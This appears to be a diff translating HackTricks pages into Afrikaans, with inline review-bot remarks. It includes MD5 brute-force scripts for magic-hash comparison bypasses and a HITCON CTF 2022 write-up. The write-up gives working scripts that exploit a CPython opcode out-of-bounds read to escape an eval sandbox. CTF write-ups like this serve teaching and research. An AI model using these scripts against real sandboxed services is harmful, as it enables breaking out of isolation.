print('Execution time: {} seconds'.format(time.time() - start))
|
||||
return result
|
||||
return wrapper
|
||||
@wraps(func)
|
||||
def wrapper(*args, **kwargs):
|
||||
print("Let's call our decorated function")
|
||||
start = time.time()
|
||||
result = func(*args, **kwargs)
|
||||
print('Execution time: {} seconds'.format(time.time() - start))
|
||||
return result
|
||||
return wrapper
|
||||
|
||||
@timeme
|
||||
def decorated_func():
|
||||
print("Decorated func!")
|
||||
print("Decorated func!")
|
||||
```
|
||||
|
||||
If you run it, you will see something like the following:
|
||||
|
||||
As jy dit uitvoer, sal jy iets soos die volgende sien:
|
||||
```
|
||||
Let's call our decorated function
|
||||
Decorated func!
|
||||
Execution time: 4.792213439941406e-05 seconds
|
||||
```
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
|
||||
|
||||
</details>
|
||||
|
|
|
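Review bot: the explanation attached to the `combinations_with_replacement` import line ("Genereer alle moontlike kombinasies vanaf die karakter voort (byvoorbeeld, die 3de is gemeng vanaf die 3de voort maar nie met die 2de of eerste nie)") is hard to follow; what the shown output actually illustrates is that an element may be reused inside one combination (pairs such as `('1', '1')` and `('3', '3')` appear) and that order is ignored, so I'd reword it to say that. In the `timeme` decorator, `time.time()` is a wall-clock value; `time.perf_counter()` is the clock meant for measuring elapsed time and gives a more reliable "Execution time" figure than the `4.79e-05` sample printed below it.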
@ -1,32 +1,28 @@
|
|||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
```python
|
||||
import hashlib
|
||||
|
||||
target = '2f2e2e' #/..
|
||||
candidate = 0
|
||||
while True:
|
||||
plaintext = str(candidate)
|
||||
hash = hashlib.md5(plaintext.encode('ascii')).hexdigest()
|
||||
if hash[-1*(len(target)):] == target: #End in target
|
||||
print('plaintext:"' + plaintext + '", md5:' + hash)
|
||||
break
|
||||
candidate = candidate + 1
|
||||
plaintext = str(candidate)
|
||||
hash = hashlib.md5(plaintext.encode('ascii')).hexdigest()
|
||||
if hash[-1*(len(target)):] == target: #End in target
|
||||
print('plaintext:"' + plaintext + '", md5:' + hash)
|
||||
break
|
||||
candidate = candidate + 1
|
||||
```
|
||||
|
||||
```python
|
||||
|
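Review bot: in the md5 search loop, `hash` shadows Python's builtin `hash()`, and the slice `hash[-1*(len(target)):] == target` is just `endswith`; renaming to `digest` and writing `digest.endswith(target)` keeps the builtin usable and reads as the `#End in target` comment intends. The shared footer also uses "github-opslag" here but "github-opslagplekke" in the file above and "github-repos" further down; the translated footer template should settle on one term before it is copied into every page.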
@ -36,50 +32,45 @@ from multiprocessing import Process, Queue, cpu_count
|
|||
|
||||
|
||||
def loose_comparison(queue, num):
|
||||
target = '0e'
|
||||
plaintext = f"a_prefix{str(num)}a_suffix"
|
||||
hash = hashlib.md5(plaintext.encode('ascii')).hexdigest()
|
||||
target = '0e'
|
||||
plaintext = f"a_prefix{str(num)}a_suffix"
|
||||
hash = hashlib.md5(plaintext.encode('ascii')).hexdigest()
|
||||
|
||||
if hash[:len(target)] == target and not any(x in "abcdef" for x in hash[2:]):
|
||||
print('plaintext: ' + plaintext + ', md5: ' + hash)
|
||||
queue.put("done") # triggers program exit
|
||||
if hash[:len(target)] == target and not any(x in "abcdef" for x in hash[2:]):
|
||||
print('plaintext: ' + plaintext + ', md5: ' + hash)
|
||||
queue.put("done") # triggers program exit
|
||||
|
||||
def worker(queue, thread_i, threads):
|
||||
for num in range(thread_i, 100**50, threads):
|
||||
loose_comparison(queue, num)
|
||||
for num in range(thread_i, 100**50, threads):
|
||||
loose_comparison(queue, num)
|
||||
|
||||
def main():
|
||||
procs = []
|
||||
queue = Queue()
|
||||
threads = cpu_count() # 2
|
||||
procs = []
|
||||
queue = Queue()
|
||||
threads = cpu_count() # 2
|
||||
|
||||
for thread_i in range(threads):
|
||||
proc = Process(target=worker, args=(queue, thread_i, threads ))
|
||||
proc.daemon = True # kill all subprocess when main process exits.
|
||||
procs.append(proc)
|
||||
proc.start()
|
||||
for thread_i in range(threads):
|
||||
proc = Process(target=worker, args=(queue, thread_i, threads ))
|
||||
proc.daemon = True # kill all subprocess when main process exits.
|
||||
procs.append(proc)
|
||||
proc.start()
|
||||
|
||||
while queue.empty(): # exits when a subprocess is done
|
||||
pass
|
||||
return 0
|
||||
while queue.empty(): # exits when a subprocess is done
|
||||
pass
|
||||
return 0
|
||||
|
||||
main()
|
||||
```
|
||||
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
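Review bot: `while queue.empty(): pass` in `main()` busy-spins a full core for as long as the workers run; `queue.get()` blocks until a worker puts "done" and exits the same way without spinning. `hash` again shadows the builtin in `loose_comparison`, and the condition `hash[:len(target)] == target and not any(x in "abcdef" for x in hash[2:])` deserves a one-line comment naming the loose-comparison case it is testing for, since the `'0e'` target only makes sense to a reader who already knows it. The comment `# kill all subprocess when main process exits.` should read "subprocesses".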
|
@ -1,122 +1,111 @@
|
|||
# LOAD\_NAME / LOAD\_CONST opcode OOB Read
|
||||
# LOAD_NAME / LOAD_CONST opcode OOB Lees
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
|
||||
|
||||
</details>
|
||||
|
||||
**This info was taken** [**from this writeup**](https://blog.splitline.tw/hitcon-ctf-2022/)**.**
|
||||
**Hierdie inligting is geneem** [**uit hierdie skryfstuk**](https://blog.splitline.tw/hitcon-ctf-2022/)**.**
|
||||
|
||||
### TL;DR <a href="#tldr-2" id="tldr-2"></a>
|
||||
|
||||
We can use OOB read feature in LOAD\_NAME / LOAD\_CONST opcode to get some symbol in the memory. Which means using trick like `(a, b, c, ... hundreds of symbol ..., __getattribute__) if [] else [].__getattribute__(...)` to get a symbol (such as function name) you want.
|
||||
Ons kan die OOB-leesfunksie in die LOAD_NAME / LOAD_CONST opcode gebruik om 'n simbool in die geheue te kry. Dit beteken dat ons 'n truuk soos `(a, b, c, ... honderde simbole ..., __getattribute__) if [] else [].__getattribute__(...)` kan gebruik om 'n simbool (soos 'n funksienaam) te kry wat jy wil hê.
|
||||
|
||||
Then just craft your exploit.
|
||||
Craft dan net jou uitbuit.
|
||||
|
||||
### Overview <a href="#overview-1" id="overview-1"></a>
|
||||
|
||||
The source code is pretty short, only contains 4 lines!
|
||||
### Oorsig <a href="#overview-1" id="overview-1"></a>
|
||||
|
||||
Die bronkode is redelik kort, dit bevat slegs 4 lyne!
|
||||
```python
|
||||
source = input('>>> ')
|
||||
if len(source) > 13337: exit(print(f"{'L':O<13337}NG"))
|
||||
code = compile(source, '∅', 'eval').replace(co_consts=(), co_names=())
|
||||
print(eval(code, {'__builtins__': {}}))1234
|
||||
```
|
||||
Jy kan arbitrêre Python-kode invoer en dit sal gekompileer word na 'n [Python-kode-objek](https://docs.python.org/3/c-api/code.html). Tog sal `co_consts` en `co_names` van daardie kode-objek vervang word met 'n leë tuple voordat die kode-objek geëvalueer word.
|
||||
|
||||
You can input arbitrary Python code, and it'll be compiled to a [Python code object](https://docs.python.org/3/c-api/code.html). However `co_consts` and `co_names` of that code object will be replaced with an empty tuple before eval that code object.
|
||||
Op hierdie manier kan alle uitdrukkings wat konstantes (bv. getalle, strings ens.) of name (bv. veranderlikes, funksies) bevat, uiteindelik 'n segmenteringsfout veroorsaak.
|
||||
|
||||
So in this way, all the expression contains consts (e.g. numbers, strings etc.) or names (e.g. variables, functions) might cause segmentation fault in the end.
|
||||
### Buitegrenslees <a href="#out-of-bound-read" id="out-of-bound-read"></a>
|
||||
|
||||
### Out of Bound Read <a href="#out-of-bound-read" id="out-of-bound-read"></a>
|
||||
|
||||
How does the segfault happen?
|
||||
|
||||
Let's start with a simple example, `[a, b, c]` could compile into the following bytecode.
|
||||
Hoe gebeur die segmenteringsfout?
|
||||
|
||||
Laten ons begin met 'n eenvoudige voorbeeld, `[a, b, c]` kan gekompileer word na die volgende bytkode.
|
||||
```
|
||||
1 0 LOAD_NAME 0 (a)
|
||||
2 LOAD_NAME 1 (b)
|
||||
4 LOAD_NAME 2 (c)
|
||||
6 BUILD_LIST 3
|
||||
8 RETURN_VALUE12345
|
||||
1 0 LOAD_NAME 0 (a)
|
||||
2 LOAD_NAME 1 (b)
|
||||
4 LOAD_NAME 2 (c)
|
||||
6 BUILD_LIST 3
|
||||
8 RETURN_VALUE12345
|
||||
```
|
||||
Maar wat as die `co_names` 'n leë tuple word? Die `LOAD_NAME 2` opcode word steeds uitgevoer en probeer waarde lees vanaf daardie geheue-adres waar dit oorspronklik moes wees. Ja, dit is 'n out-of-bound lees "kenmerk".
|
||||
|
||||
But what if the `co_names` become empty tuple? The `LOAD_NAME 2` opcode is still executed, and try to read value from that memory address it originally should be. Yes, this is an out-of-bound read "feature".
|
||||
|
||||
The core concept for the solution is simple. Some opcodes in CPython for example `LOAD_NAME` and `LOAD_CONST` are vulnerable (?) to OOB read.
|
||||
|
||||
They retrieve an object from index `oparg` from the `consts` or `names` tuple (that's what `co_consts` and `co_names` named under the hood). We can refer to the following short snippest about `LOAD_CONST` to see what CPython does when it proccesses to `LOAD_CONST` opcode.
|
||||
Die kernkonsep vir die oplossing is eenvoudig. Sommige opcodes in CPython, soos `LOAD_NAME` en `LOAD_CONST`, is kwesbaar (?) vir OOB-lees.
|
||||
|
||||
Hulle haal 'n voorwerp uit die indeks `oparg` van die `consts` of `names` tuple (dit is wat `co_consts` en `co_names` onder die oppervlak genoem word). Ons kan na die volgende kort snipper oor `LOAD_CONST` verwys om te sien wat CPython doen wanneer dit die `LOAD_CONST` opcode verwerk.
|
||||
```c
|
||||
case TARGET(LOAD_CONST): {
|
||||
PREDICTED(LOAD_CONST);
|
||||
PyObject *value = GETITEM(consts, oparg);
|
||||
Py_INCREF(value);
|
||||
PUSH(value);
|
||||
FAST_DISPATCH();
|
||||
PREDICTED(LOAD_CONST);
|
||||
PyObject *value = GETITEM(consts, oparg);
|
||||
Py_INCREF(value);
|
||||
PUSH(value);
|
||||
FAST_DISPATCH();
|
||||
}1234567
|
||||
```
|
||||
Op hierdie manier kan ons die OOB-funksie gebruik om 'n "naam" vanaf 'n arbitrêre geheueverskuiwing te kry. Om seker te maak watter naam dit het en watter verskuiwing dit het, bly net probeer `LOAD_NAME 0`, `LOAD_NAME 1` ... `LOAD_NAME 99` ... En jy kan iets vind in ongeveer oparg > 700. Jy kan ook probeer om gdb te gebruik om na die geheue-uitleg te kyk, maar ek dink nie dit sal makliker wees nie?
|
||||
|
||||
In this way we can use the OOB feature to get a "name" from arbitrary memory offset. To make sure what name it has and what's it's offset, just keep trying `LOAD_NAME 0`, `LOAD_NAME 1` ... `LOAD_NAME 99` ... And you could find something in about oparg > 700. You can also try to use gdb to take a look at the memory layout of course, but I don't think it would be more easier?
|
||||
|
||||
### Generating the Exploit <a href="#generating-the-exploit" id="generating-the-exploit"></a>
|
||||
|
||||
Once we retrieve those useful offsets for names / consts, how _do_ we get a name / const from that offset and use it? Here is a trick for you:\
|
||||
Let's assume we can get a `__getattribute__` name from offset 5 (`LOAD_NAME 5`) with `co_names=()`, then just do the following stuff:
|
||||
### Die Exploit Genereer <a href="#generating-the-exploit" id="generating-the-exploit"></a>
|
||||
|
||||
Sodra ons daardie nuttige verskuiwings vir name / konstantes herwin het, hoe _kry_ ons 'n naam / konstante vanaf daardie verskuiwing en gebruik dit? Hier is 'n truuk vir jou:\
|
||||
Laat ons aanneem ons kan 'n `__getattribute__`-naam vanaf verskuiwing 5 (`LOAD_NAME 5`) met `co_names=()` kry, doen dan net die volgende stappe:
|
||||
```python
|
||||
[a,b,c,d,e,__getattribute__] if [] else [
|
||||
[].__getattribute__
|
||||
# you can get the __getattribute__ method of list object now!
|
||||
[].__getattribute__
|
||||
# you can get the __getattribute__ method of list object now!
|
||||
]1234
|
||||
```
|
||||
> Merk op dat dit nie nodig is om dit as `__getattribute__` te noem nie, jy kan dit 'n korter of vreemder naam gee.
|
||||
|
||||
> Notice that it is not necessary to name it as `__getattribute__`, you can name it as something shorter or more weird
|
||||
|
||||
You can understand the reason behind by just viewing it's bytecode:
|
||||
|
||||
Jy kan die rede daarvoor verstaan deur net na sy bytecode te kyk:
|
||||
```python
|
||||
0 BUILD_LIST 0
|
||||
2 POP_JUMP_IF_FALSE 20
|
||||
>> 4 LOAD_NAME 0 (a)
|
||||
>> 6 LOAD_NAME 1 (b)
|
||||
>> 8 LOAD_NAME 2 (c)
|
||||
>> 10 LOAD_NAME 3 (d)
|
||||
>> 12 LOAD_NAME 4 (e)
|
||||
>> 14 LOAD_NAME 5 (__getattribute__)
|
||||
16 BUILD_LIST 6
|
||||
18 RETURN_VALUE
|
||||
20 BUILD_LIST 0
|
||||
>> 22 LOAD_ATTR 5 (__getattribute__)
|
||||
24 BUILD_LIST 1
|
||||
26 RETURN_VALUE1234567891011121314
|
||||
0 BUILD_LIST 0
|
||||
2 POP_JUMP_IF_FALSE 20
|
||||
>> 4 LOAD_NAME 0 (a)
|
||||
>> 6 LOAD_NAME 1 (b)
|
||||
>> 8 LOAD_NAME 2 (c)
|
||||
>> 10 LOAD_NAME 3 (d)
|
||||
>> 12 LOAD_NAME 4 (e)
|
||||
>> 14 LOAD_NAME 5 (__getattribute__)
|
||||
16 BUILD_LIST 6
|
||||
18 RETURN_VALUE
|
||||
20 BUILD_LIST 0
|
||||
>> 22 LOAD_ATTR 5 (__getattribute__)
|
||||
24 BUILD_LIST 1
|
||||
26 RETURN_VALUE1234567891011121314
|
||||
```
|
||||
Let daarop dat `LOAD_ATTR` ook die naam uit `co_names` haal. Python laai name vanaf dieselfde offset as die naam dieselfde is, so die tweede `__getattribute__` word steeds vanaf offset=5 gelaai. Deur van hierdie kenmerk gebruik te maak, kan ons willekeurige name gebruik as die naam in die nabygeleë geheue is.
|
||||
|
||||
Notice that `LOAD_ATTR` also retrieve the name from `co_names`. Python loads names from the same offset if the name is the same, so the second `__getattribute__` is still loaded from offset=5. Using this feature we can use arbitrary name once the name is in the memory nearby.
|
||||
Dit behoort maklik te wees om getalle te genereer:
|
||||
|
||||
For generating numbers should be trivial:
|
||||
|
||||
* 0: not \[\[]]
|
||||
* 1: not \[]
|
||||
* 2: (not \[]) + (not \[])
|
||||
* 0: nie \[\[]]
|
||||
* 1: nie \[]
|
||||
* 2: (nie \[]) + (nie \[])
|
||||
* ...
|
||||
|
||||
### Exploit Script <a href="#exploit-script-1" id="exploit-script-1"></a>
|
||||
### Uitbuitingskrip <a href="#exploit-script-1" id="exploit-script-1"></a>
|
||||
|
||||
I didn't use consts due to the length limit.
|
||||
|
||||
First here is a script for us to find those offsets of names.
|
||||
Ek het nie konstantes gebruik as gevolg van die lengtebeperking nie.
|
||||
|
||||
Eerstens is hier 'n krip vir ons om daardie offsette van name te vind.
|
||||
```python
|
||||
from types import CodeType
|
||||
from opcode import opmap
|
||||
|
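Review bot: several code blocks in this section end with line-number residue copied from the source blog (`{}}))1234`, `8 RETURN_VALUE12345`, `}1234567`, `]1234`, `26 RETURN_VALUE1234567891011121314`), which turns the Python snippets into syntax errors as shown; strip the digits from the last line of each fenced block. In the Afrikaans text, "Laten ons begin" is Dutch (Afrikaans would be "Laat ons begin" or "Kom ons begin"), "Craft dan net jou uitbuit" leaves "Craft" untranslated, "snipper" is not a word (use "uittreksel" or "kodestukkie"), and "'n krip" should be "'n skrip". The source blog is credited at the top of the page, so keeping its wording close in translation is the right call; these are just the spots where the translation slipped.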
@ -124,56 +113,54 @@ from sys import argv
|
|||
|
||||
|
||||
class MockBuiltins(dict):
|
||||
def __getitem__(self, k):
|
||||
if type(k) == str:
|
||||
return k
|
||||
def __getitem__(self, k):
|
||||
if type(k) == str:
|
||||
return k
|
||||
|
||||
|
||||
if __name__ == '__main__':
|
||||
n = int(argv[1])
|
||||
n = int(argv[1])
|
||||
|
||||
code = [
|
||||
*([opmap['EXTENDED_ARG'], n // 256]
|
||||
if n // 256 != 0 else []),
|
||||
opmap['LOAD_NAME'], n % 256,
|
||||
opmap['RETURN_VALUE'], 0
|
||||
]
|
||||
code = [
|
||||
*([opmap['EXTENDED_ARG'], n // 256]
|
||||
if n // 256 != 0 else []),
|
||||
opmap['LOAD_NAME'], n % 256,
|
||||
opmap['RETURN_VALUE'], 0
|
||||
]
|
||||
|
||||
c = CodeType(
|
||||
0, 0, 0, 0, 0, 0,
|
||||
bytes(code),
|
||||
(), (), (), '<sandbox>', '<eval>', 0, b'', ()
|
||||
)
|
||||
c = CodeType(
|
||||
0, 0, 0, 0, 0, 0,
|
||||
bytes(code),
|
||||
(), (), (), '<sandbox>', '<eval>', 0, b'', ()
|
||||
)
|
||||
|
||||
ret = eval(c, {'__builtins__': MockBuiltins()})
|
||||
if ret:
|
||||
print(f'{n}: {ret}')
|
||||
ret = eval(c, {'__builtins__': MockBuiltins()})
|
||||
if ret:
|
||||
print(f'{n}: {ret}')
|
||||
|
||||
# for i in $(seq 0 10000); do python find.py $i ; done1234567891011121314151617181920212223242526272829303132
|
||||
```
|
||||
|
||||
And the following is for generating the real Python exploit.
|
||||
|
||||
En die volgende is vir die genereer van die werklike Python uitbuiting.
|
||||
```python
|
||||
import sys
|
||||
import unicodedata
|
||||
|
||||
|
||||
class Generator:
|
||||
# get numner
|
||||
def __call__(self, num):
|
||||
if num == 0:
|
||||
return '(not[[]])'
|
||||
return '(' + ('(not[])+' * num)[:-1] + ')'
|
||||
# get numner
|
||||
def __call__(self, num):
|
||||
if num == 0:
|
||||
return '(not[[]])'
|
||||
return '(' + ('(not[])+' * num)[:-1] + ')'
|
||||
|
||||
# get string
|
||||
def __getattribute__(self, name):
|
||||
try:
|
||||
offset = None.__dir__().index(name)
|
||||
return f'keys[{self(offset)}]'
|
||||
except ValueError:
|
||||
offset = None.__class__.__dir__(None.__class__).index(name)
|
||||
return f'keys2[{self(offset)}]'
|
||||
# get string
|
||||
def __getattribute__(self, name):
|
||||
try:
|
||||
offset = None.__dir__().index(name)
|
||||
return f'keys[{self(offset)}]'
|
||||
except ValueError:
|
||||
offset = None.__class__.__dir__(None.__class__).index(name)
|
||||
return f'keys2[{self(offset)}]'
|
||||
|
||||
|
||||
_ = Generator()
|
||||
|
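Review bot: the usage comment `# for i in $(seq 0 10000); do python find.py $i ; done1234567...32` carries the same fused line numbers and should end at `done`; `# get numner` is a typo for "number". The `CodeType(...)` call passes 15 positional arguments, which matches the CPython 3.8 to 3.10 constructor (argcount, posonlyargcount, kwonlyargcount, nlocals, stacksize, flags, code, consts, names, varnames, filename, name, firstlineno, lnotab, freevars); on 3.11 and later the constructor also requires `qualname` and `exceptiontable`, so the block should say which interpreter version it was written against rather than failing with a `TypeError` for readers on a newer one. A short comment on `MockBuiltins` would also help: returning the key string from `__getitem__` is what makes `eval` hand back the name found at offset `n` instead of raising `NameError`.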
@ -181,29 +168,29 @@ _ = Generator()
|
|||
names = []
|
||||
chr_code = 0
|
||||
for x in range(4700):
|
||||
while True:
|
||||
chr_code += 1
|
||||
char = unicodedata.normalize('NFKC', chr(chr_code))
|
||||
if char.isidentifier() and char not in names:
|
||||
names.append(char)
|
||||
break
|
||||
while True:
|
||||
chr_code += 1
|
||||
char = unicodedata.normalize('NFKC', chr(chr_code))
|
||||
if char.isidentifier() and char not in names:
|
||||
names.append(char)
|
||||
break
|
||||
|
||||
offsets = {
|
||||
"__delitem__": 2800,
|
||||
"__getattribute__": 2850,
|
||||
'__dir__': 4693,
|
||||
'__repr__': 2128,
|
||||
"__delitem__": 2800,
|
||||
"__getattribute__": 2850,
|
||||
'__dir__': 4693,
|
||||
'__repr__': 2128,
|
||||
}
|
||||
|
||||
variables = ('keys', 'keys2', 'None_', 'NoneType',
|
||||
'm_repr', 'globals', 'builtins',)
|
||||
'm_repr', 'globals', 'builtins',)
|
||||
|
||||
for name, offset in offsets.items():
|
||||
names[offset] = name
|
||||
names[offset] = name
|
||||
|
||||
for i, var in enumerate(variables):
|
||||
assert var not in offsets
|
||||
names[792 + i] = var
|
||||
assert var not in offsets
|
||||
names[792 + i] = var
|
||||
|
||||
|
||||
source = f'''[
|
||||
|
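Review bot: the hard-coded offsets (2800, 2850, 4693, 2128, and the base 792 used for `variables`) are values recovered for one particular interpreter build and memory layout, but nothing in the file says so; a comment stating that they came from the `find.py` loop in the previous block and must be re-derived for each target interpreter would stop readers from treating them as constants. `names[792 + i] = var` also overwrites whatever identifier already sat in that slot, and `assert var not in offsets` only checks the name, not the slot, so a matching check on the index would guard the other collision.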
@ -214,13 +201,13 @@ NoneType := None_.__getattribute__({_.__class__}),
|
|||
keys2 := NoneType.__dir__(NoneType),
|
||||
get := NoneType.__getattribute__,
|
||||
m_repr := get(
|
||||
get(get([],{_.__class__}),{_.__base__}),
|
||||
{_.__subclasses__}
|
||||
get(get([],{_.__class__}),{_.__base__}),
|
||||
{_.__subclasses__}
|
||||
)()[-{_(2)}].__repr__,
|
||||
globals := get(m_repr, m_repr.__dir__()[{_(6)}]),
|
||||
builtins := globals[[*globals][{_(7)}]],
|
||||
builtins[[*builtins][{_(19)}]](
|
||||
builtins[[*builtins][{_(28)}]](), builtins
|
||||
builtins[[*builtins][{_(28)}]](), builtins
|
||||
)
|
||||
]'''.strip().replace('\n', '').replace(' ', '')
|
||||
|
||||
|
